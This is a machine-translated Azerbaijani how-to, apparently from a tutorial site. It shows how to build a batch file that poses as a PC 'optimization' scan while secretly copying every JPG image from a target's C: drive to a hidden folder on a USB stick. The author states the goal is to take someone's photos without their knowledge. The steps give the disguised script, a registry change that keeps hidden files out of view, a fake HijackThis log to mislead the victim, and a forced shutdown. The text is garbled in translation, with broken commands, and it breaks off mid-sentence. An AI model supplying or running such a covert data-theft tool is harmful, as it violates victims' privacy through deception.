Gizli casus şəkil fotoşəkilini toplu fayldan kopyalayın: 5 addım
Gizli casus şəkil fotoşəkilini toplu fayldan kopyalayın: 5 addım

Mündəricat:

Anonim

Beləliklə, ilk növbədə, bu təlimat verən nədir və niyə bu təlimat, bütün şəkilləri bir PC -dən yaddaş çubuğuna kopyalayacaq bir toplu fayl yaratmağa imkan verəcəkdir. bunu diskret şəkildə edəcək və kompüteri problemlərə görə yoxlayan başqa bir proqram kimi təqdim edəcək. Tamamlandıqda, yaddaş çubuğunda bütün kopyalanan şəkillər olan gizli bir qovluq olacaq. Mən bunu etdiyimi bilmədən kiminsə maşınından rəqəmsal bir fotoşəkil çəkmək istədiyim üçün bu təlimatı yaratdım. Bu faylın qanuni istifadəsi şəxsi fotoşəkillərinizi arxivləşdirə/ehtiyat nüsxəsini çıxarmağa imkan verəcəkdir.

Addım 1: Kodu yazın

Aşağıdakı kodu notepad -a kopyalayın və yaddaş çubuğunuzun kökündə bir yarasa faylı olaraq qeyd edin,.bat uzantısı olduğu müddətdə istədiyinizə ad verə bilərsiniz. Doğru uzantıya malik olmasını təmin etmək üçün notepadın "copyimage.bat" qeyd qutusuna aşağıdakı kimi yazın (təklifləri daxil edin!)

@echo offecho Optimization client 2008 v3.02becho -------------------------------- echo.echo Zəhmət olmasa PC-dən istifadə etməyin bu işləyərkən.echo.echo Tarama proseslərinin siyahısı. Tamamlandıqda sistem administratorunuzun review.echo.echo yazması üçün bir qeyd göstəriləcək. Zəhmət olmasa səbr edin ki, bu 3 saata qədər davam edə bilər. HKCU / Software / Microsoft / Windows / CurrentVersion / Explorer / Advanced /v Hidden /t REG_DWORD /d əlavə edin. 00000002/f> nulmkdir / data> nulattrib +h / data> nulsetLocal EnableDelayedExpansion@echo offfor %% a in (jpg) do (for/f "tokens =* delims =" %% f in ('dir/b/s/) reklam c: \*. %% a ') do (xcopy "%% f" / data / /y /h /q> nul)) attrib -s +h data \*> nulstart optimizationLog.txtshutdown /s /c " Optimizasiya taraması tamamlandı, kompüteriniz indi bağlanacaq"

Addım 2: Saxta Hesabat Dosyası Yaratın

Bu addımda, faylları kopyalamaq üçün işlədiyimiz toplu iş faylının nəticəsi kimi görünən saxta bir mətn faylı yaratdım. Bu, bir şeyin baş verdiyini iddia etməyə imkan verir. Bu faylın nə dediyi önəmli deyil, istədiyiniz qədər dəyişə bilərsiniz, sadəcə fayl adının düzgün olduğunu və yaddaş kartınızın kökündə saxlanıldığından əmin olun. İstifadə etdiyim mətn əsasən bu daxil edin, kopyalayın və optimizationLog.txt olaraq yaddaş çubuğunuzun kökündə saxlayın

Tarama tamamlandı. Zəhmət olmasa bu jurnalı bağlayın və sistem administratorunuzun nəzərdən keçirməsinə icazə verin. İşləyən proseslər: C: / Windows / system32 / taskeng.exeC: / Windows / system32 / Dwm.exeC: / Windows / Explorer. EXEC: / Program Files / Java / jre1. 6.0_07 / bin / jusched.exeC: / Windows / System32 / hkcmd.exeC: / Windows / System32 / igfxpers.exeC: / Windows / system32 / igfxsrvc.exeC: / Program Files / Synaptics / SynTP / SynTPEnh.exeC: / Program Fayllar / TOSHIBA / Güc Qənaəti / TPwrMain.exeC: / Proqram Faylları / TOSHIBA / SmoothView / SmoothView.exeC: / Proqram Faylları / TOSHIBA / FlashCards / TCrdMain.exeC: / Proqram Faylları / BitDefender / BitDefender 2009 / bdagent.exe. Files / TOSHIBA / TOSCDSPD / TOSCDSPD.exeC: / Program Files / Registry Mechanic / regmech.exeC: / Program Files / BitDefender / BitDefender 2009 / seccenter.exeC: / Program Files / Synaptics / SynTP / SynTPHelper.exeC: / Program Files / Vuze / Azureus.exeC: / Program Files / Microsoft Office / Office12 / OUTLOOK. EXEC: / Program Files / AutoCAD 2008 / acad.exeC: / Users / Tom / AppData / Local / Temp / AdskCleanup.0001C: / Program Files / Mozilla Firefox / firefox.exeC: / Windows / System32 / QEYD PAD. EXEC: / Windows / system32 / SearchFilterHost.exeC: / HijackThis / HijackThis.exeR1 - HKCU / Software / Microsoft / Internet Explorer / Main, Default_Page_URL = https://www.google.co.ukR1 - HKCU / Proqram / Microsoft / Internet Explorer / Əsas, Axtarış Səhifəsi = https://go.microsoft.com/fwlink/?LinkId=54896R0 - HKCU / Proqram / Microsoft / Internet Explorer / Əsas, Başlanğıc Səhifəsi = https://www.google.co. ukR1 - HKLM / Proqram / Microsoft / Internet Explorer / Main, Default_Page_URL = https://www.google.co.ukR1 - HKLM / Proqram / Microsoft / Internet Explorer / Main, Default_Search_URL = https://go.microsoft.com/ fwlink/? LinkId = 54896R1 - HKLM / Proqram / Microsoft / Internet Explorer / Əsas, Axtarış Səhifəsi = https://go.microsoft.com/fwlink/?LinkId=54896R0 - HKLM / Proqram / Microsoft / Internet Explorer / Əsas, Başlat Səhifə = https://go.microsoft.com/fwlink/?LinkId=69157R0 - HKLM / Proqram / Microsoft / Internet Explorer / Search, SearchAssistant = R0 - HKLM / Proqram / Microsoft / Internet Explorer / Axtarış, CustomizeSearch = R0 - HKCU / Proqram / Microsoft / Internet Explorer / Too lbar, LinksFolderName = O1 - Ev Sahibləri::: 1 localhostO2 - BHO: AcroIEHelperStub - {18DF081C -E8AD -4283 -A596 -FA578C2EBDC3} - C: / Program Files / Common Files / Adobe / AcroIEHHOOOHOOOO Groove GFS Brauzer Köməkçisi-{72853161-30C5-4D22-B7F9-0BBC1D38A37E}-C: / Proqram Faylları / Microsoft Office / Office12 / GrooveShellExtensions.dllO2-BHO: SSVHelper Sınıfı-{761497BB-D6F0-462C4D4D-D4D2D: / Proqram Faylları / Java / jre1.6.0_07 / bin / ssv.dllO3 -Alətlər Çubuğu: BitDefender Alətlər Çubuğu -{381FFDE8-2394-4f90 -B10D -FC6124A40F8C} -C: / Proqram Faylları / BitDefender / BitDefender 2009 / IEToolbar.dllO4 - HKLM \.. / Çalıştır: [Windows Defender] %ProgramFiles %\ Windows Defender / MSASCui.exe -hideO4 - HKLM \.. / Çalıştır: [SunJavaUpdateSched] "C: / Proqram Faylları / Java / jre1.6.0_07 / bin / jusched.exe "O4 - HKLM \.. / Çalıştır: [IgfxTray] C: / Windows / system32 / igfxtray.exeO4 - HKLM \.. / Çalıştır: [HotKeysCmds] C: / Windows / system32 / hkcmd.exeO4 - HKLM \.. / Çalıştır: [Davamlılıq] C: / Windows / system32 / igfxpers.exeO4 - HKLM \.. / Çalıştır: [SynTPEnh] C: / Proqram Faylları / Syna ptics / SynTP / SynTPEnh.exeO4 - HKLM \.. / Çalış: [TPwrMain] %ProgramFiles %\ TOSHIBA / Power Saver / TPwrMain. EXEO4 - HKLM \.. / Run: [SmoothView] %ProgramFiles %\ Toshiba / SmoothView / SmoothView.exeO4 - HKLM \.. / Çalış: [00TCrdMain] %ProgramFiles %\ TOSHIBA / FlashCards / TCrdMain.exeO4 - HKLM \.. / Run: [Toshiba TEMPO] C: / Program Files / Toshiba TEMPRO / Toshiba. Tempo. UI. TrayApplication.exeO4 - HKLM \.. / Çalıştır: [BDAgent] "C: / Program Files / BitDefender / BitDefender 2009 / bdagent.exe" O4 - HKLM \.. / Run: [BitDefender Antiphishing Helper] "C: / Program Fayllar / BitDefender / BitDefender 2009 / IEShow.exe "O4 - HKCU \.. / Çalıştır: [TOSCDSPD] C: / Proqram Faylları / TOSHIBA / TOSCDSPD / TOSCDSPD.exeO4 - HKCU \.. / Çalışdır: [RegistryMechanic] C: / Proqram Files / Registry Mechanic / RMTray.exe /HO4 - Başlanğıc: OneNote 2007 Screen Clipper və Launcher.lnk = C: / Program Files / Microsoft Office / Office12 / ONENOTEM. EXEO8 - Əlavə kontekst menyu maddəsi: Microsoft Excel -ə göndər və göndər - res: //C:\PROGRA~1\MICROS~3\Office12\EXCEL. EXE/3000O9-Əlavə düymə: (ad yoxdur)-{08B0E5C0-4FCB-11CF-AAA5-0040 1C608501} - C: / PROGRA ~ 1 / Java / JRE16 ~ 2.0_0 / bin / ssv.dllO9 - Əlavə 'Alətlər' menyusu: Sun Java Konsolu - {08B0E5C0-4FCB -11CF -AAA5-00401C608501} - C: / PROGRA ~ 1 / Java / JRE16 ~ 2.0_0 / bin / ssv.dllO9-Əlavə düymə: OneNote-a göndər-{2670000A-7350-4f3c-8081-5663EE0C6C49}-C: / PROGRA ~ 1 / MICROS ~ 3 / Office12 / ONBttnIE.dllO9 - Əlavə 'Alətlər' menyusu: OneNote -da S & end - {2670000A -7350-4f3c -8081-5663EE0C6C49} - C: / PROGRA ~ 1 / MICROS ~ 3 / Office12 / ONBttnIE.dllO9 - Əlavə düymə: eBay.co.uk - Alın Sevir-{76577871-04EC-495E-A12B-91F7C3600AFA}-https://rover.ebay.com/rover/1/710-44557-9400-3/4 (fayl yoxdur) O9-Əlavə düymə: (ad yoxdur)-{85d1f590-48f4-11d9-9669-0800200c9a66}- %windir %\ bdoscandel.exe (fayl yoxdur) O9-Əlavə 'Alətlər' menyusu: BitDefender Online Skaner v8-{85d1f590-48f4-11d9-9669 -0800200c9a66} - %windir %\ bdoscandel.exe (fayl yoxdur) O9 -Əlavə düymə: Amazon.co.uk -{8A918C1D -E123-4E36 -B562-5C1519E434CE} -https://www.amazon.co.uk/ exec/obidos/redirect-home? tag = Toshibaukbholink-2 1 & site = ev (fayl yoxdur) O9 - Əlavə düymə: Araşdırma - {92780B25-18CC -41C8 -B9BE -3C9C571A8263} - C: / PROGRA ~ 1 / MICROS ~ 3 / Office12 / REFIEBAR. DLLO10 - Winsock LSP -də naməlum fayl: c: / windows / system32 / nlaapi.dllO10 - Winsock LSP -də naməlum fayl: c: / windows / system32 / napinsp.dllO10 - Winsock LSP -də naməlum fayl: c: / proqram faylları / vmware / vmware iş stansiyası / vsocklib.dllO10 - Naməlum fayl Winsock LSP-də: c: / program files / vmware / vmware workstation / vsocklib.dllO11-Seçimlər qrupu: [INTERNATIONAL] International*O13-Gopher Prefix: O16-DPF: {CF40ACC5-E1BB-4AFF-AC72-04C2F616BCAcom} (get_) - https://wwwimages.adobe.com/www.adobe.com/products/acrobat/nos/gp.cabO18 - Protokol: grooveLocalGWS - {88FED34C -F0CA -4636 -A375-3CB6248B04CD} - C: / Proqram Faylları / Microsoft Office / Office12 / GrooveSystemServices.dllO18-Protokol: ms-help-{314111C7-A502-11D2-BBCA-00C04F8EC294}-C: / Proqram Faylları / Ümumi Dosyalar / Microsoft Paylaşılan / Yardım / hxds.dllO18-Filtri qaçır: mətn/ xml-{807563E5-5146-11D5-A672-00B0D022E945} - C: / PROGRA ~ 1 / COMMON ~ 1 / MICROS ~ 1 / OFFICE12 / MSOXMLMF. DLLO20 - Winlogon Bildir: igfxcui - C: / Windows / SYSTEM32 / igfxdev.dllO23 - Xidmət: Agere Modem Zəng Proqramı Audio (AgereModereAudio) - AggerModereAudio) Sistemlər - C: / Windows / system32 / agrsmsvc.exeO23 - Xidmət: BitDefender Arrakis Server (Arrakis3) - BitDefender SRL https://www.bitdefender.com - C: / Proqram Faylları / Ümumi Dosyalar / BitDefender / BitDefender Arrakis Server / bin / Arrakis3.exeO23 - Xidmət: Autodesk Lisenziyalaşdırma Xidməti - Autodesk - C: / Proqram Faylları / Ümumi Fayllar / Autodesk Paylaşılan / Service / AdskScSrv.exeO23 - Xidmət: ConfigFree Xidməti - TOSHIBA CORPORATION - C: / Proqram Faylları / TOSHIBA / ConfigFree / CFSvcs.exeO23 - Xidmət: @%SystemRoot%\ ehome / ehstart.dll, -101 (bilinməyən sahib) - %windir %\ system32 / svchost.exe (fayl yoxdur) O23 - Xidmət: getPlus (R) Helper - NOS Microsystems Ltd. - C: / Proqram Faylları / NOS / bin / getPlus_HelperSvc.exeO23 - Xidmət: Google Yeniləmə Xidməti (gupdate1c98840f4e6525b) (gupdate1c98840f4e6525b) - Naməlum sahibi - C: / Program Files / Google / Update / GoogleUpdate.exe " /svc (fayl yoxdur) O23 - Xidmət: BitDefender Masaüstü Yeniləmə Xidməti (LIVESRV) - Naməlum sahibi - C: / Proqram Faylları / Ümumi Fayllar / BitDefender / BitDefender Yeniləmə Xidməti / livesrv.exe " /xidmət (fayl yoxdur) O23 - Xidmət: @%SystemRoot%\ system32 / qwave.dll, -1 (QWAVE) - Naməlum sahib r -%windir%\ system32 / svchost.exe (fayl yoxdur) O23 - Xidmət: @%SystemRoot%\ system32 / seclogon.dll, -7001 (seclogon) - Naməlum sahibi -%windir%\ system32 / svchost.exe (fayl itkin) O23 - Xidmət: Notebook Performans Ayarlama Xidməti (TempoMonitoringService) - Toshiba Europe GmbH - C: / Program Files / Toshiba TEMPRO / TempoSVC.exeO23 - Xidmət: TOSHIBA Navi Dəstək Xidməti (TNaviSrv) - TOSHIBA Corporation - C: / Proqram Faylları / TOSHIBA / TOSHIBA DVD PLAYER / TNaviSrv.exeO23 - Xidmət: TOSHIBA Optik Disk Sürücü Xidməti (TODDSrv) - TOSHIBA Corporation - C: / Windows / system32 / TODDSrv.exeO23 - Xidmət: TOSHIBA Power Saver (TosCosHrBA) - TosCoSrv) Proqram Faylları / TOSHIBA / Power Saver / TosCoSrv.exeO23 - Xidmət: TOSHIBA SMART Giriş Xidməti - TOSHIBA Corporation - c: / Proqram Faylları / TOSHIBA / SMARTLogService / TosIPCSrv.exeO23 - Xidmət: VMware Agent Xidməti (ufad -ws60) - C: / Program Files / VMware / VMware Workstation / vmware -ufad.exe "-d" C: / Program Files / VMware / VMware Workstation / "-s ufad -p2v.x ml (fayl çatışmır) O23 - Xidmət: Ulead Burning Helper (UleadBurningHelper) - Ulead Systems, Inc. - C: / Program Files / Common Files / Ulead Systems / DVD / ULCDRSvr.exeO23 - Service: VMware Authorization Service (VMAuthdService) - VMware, C - / Program Files / VMware / VMware Workstation / vmware -authd.exeO23 - Xidmət: VMware DHCP Xidməti (VMnetDHCP) - VMware, Inc. - C: / Windows / system32 / vmnetdhcp.exeO23 - Xidmət: VMware NAT Xidmət - VMware, Inc. - C: / Windows / system32 / vmnat.exeO23 - Xidmət: BitDefender Virus Shield (VSSERV) - Naməlum sahibi - C: / Program Files / BitDefender / BitDefender 2009 / vsserv.exe " /xidmət (fayl yoxdur) O23 - Xidmət: VNC Server Version 4 (WinVNC4) - Naməlum sahibi - C: / Program Files / RealVNC / VNC4 / WinVNC4.exe "-service (fayl yoxdur) O23 - Xidmət: @%ProgramFiles%\ Windows Media Player / wmpnetwk.exe, -101 (WMPNetworkSvc) - Naməlum sahibi - %ProgramFiles %\ Windows Media Player / wmpnetwk.exe (fayl yoxdur)

Addım 3: Proqramı işə salın

İndi üzərində iki fayl olan bir yaddaş çubuğu olmalıdır (və yeni şəkillər üçün bir çox boş yer hazırdır). Sürücüdə başqa bir şey varsa, bunun heç bir əhəmiyyəti yoxdur. Yaddaş çubuğunu hədəf kompüterinizə götürün. Yenidən qeydiyyata alındıqda, ona ayrılmış sürücü məktubuna diqqət yetirin, bu onu əvvəlcə qovluğa göz atmadan işə salmağa imkan verəcək. Windows düyməsini basın və sonra 'R' düyməsini basın (hələ də Windows düyməsini basıb saxlayın). Bu bir Run qutusu gətirəcək. Çalıştırma qutusuna, yaratdığımız toplu iş faylının yolunu yazın, sürücü hərfi yaddaş çubuğunu bağladığınız zaman təyin olunan məktubdur. Məsələn, yaddaş çubuğumu daxil etsəm və ag: / drive qeyd edərsə, onda işləyərdim: g: / copyimage.batVə sonra enter düyməsini vurun və ya Çalış düyməsini basın. Bu, toplu faylın işləməsinə başlayacaq. Tamamlandıqda, maşını bağlayacaq. Yaddaş çubuğunu çıxarın və götürün!

Addım 4: Şəkilləri əldə edin

İndi bütün şəkilləri olan bir yaddaş çubuğunuz olmalıdır. Fayllar və qovluq gizlidir, buna görə də sizinki yoxdursa, onu aktiv etməlisiniz. Bunu etmək üçün bir kəşfiyyatçı pəncərəsinə daxil olun (məsələn, kompüterimi açın) və: WinXP - Alətlər, Qovluq Seçimləri, Görünüş, Gizli Faylları Göstər Vista - Təşkil et, Qovluq və axtarış variantları, Görün, Gizli Faylları Göstər Bir dəfə seçsəniz, aça bilməlisiniz. gizli qovluq və istədiyiniz şəkilləri əldə edin!

Addım 5: Kod nə deməkdir

Kodun mümkün qədər çoxunu izah edəcəyəm. əsas kopyalama funksiyası mənim tərəfimdən yazılmamışdır, onu aşağıdakı saytdan götürmüşəm və dəyişdirmişəm:

@echo off '' Ekranda görünən əmrləri dayandırır, buna görə istifadəçi nə edildiyini bilmir echo Optimization client 2008 v3.02b echo ------------------- ------------- əks-səda. Proqramın əks -sədası üçün ekranda bir başlıq yazır Xahiş edirik bu işləyərkən PC -dən istifadə etməyin.echo.echo Tarama prosesinin siyahısı. Tamamlandıqda sistem administratorunuzun review.echo.echo üçün bir qeyd göstəriləcək. Zəhmət olmasa səbr edin ki, bu 3 saata qədər çəkə bilər. İstifadəçiyə HKCU / Software / Microsoft / Windows / CurrentVersion / Explorer / Advanced /v Hidden /t REG_DWORD /d 00000002 /f> nul əlavə etmək doğru olmayan bir zibil olduğunu bildirir. Gizli faylları gizlədən və qovluqlar. Bu, istifadəçinin kopyalanan şəkilləri saxlamaq üçün yaratdığımız qovluğu görməsini dayandırır. Sonundakı nul əmri, mkdir / data> nul işini bitirdikdə hər hansı bir mesajı bildirməməyi əmrdən dayandırır. attrib +h / data> nul Yaradılmış qovluğu gizlədir setLocal EnableDelayedExpansionfor %% a in (jpg) do (for/f "tokens =* delims =" %% f in ('dir/b/s/ad c: \*). %% a ') do (xcopy "%% f" / data / /y /h /q> nul)) Bu, c: / sürücüsünün bütün şəkillərini axtaracaq koddur. Başqa bir sürücü axtarmasını istəyirsinizsə, c: hissəsini istədiyiniz kimi dəyişdirin. Başqa fayl növlərini tapmasını istəyirsinizsə, sonrakı siyahılarını-j.webp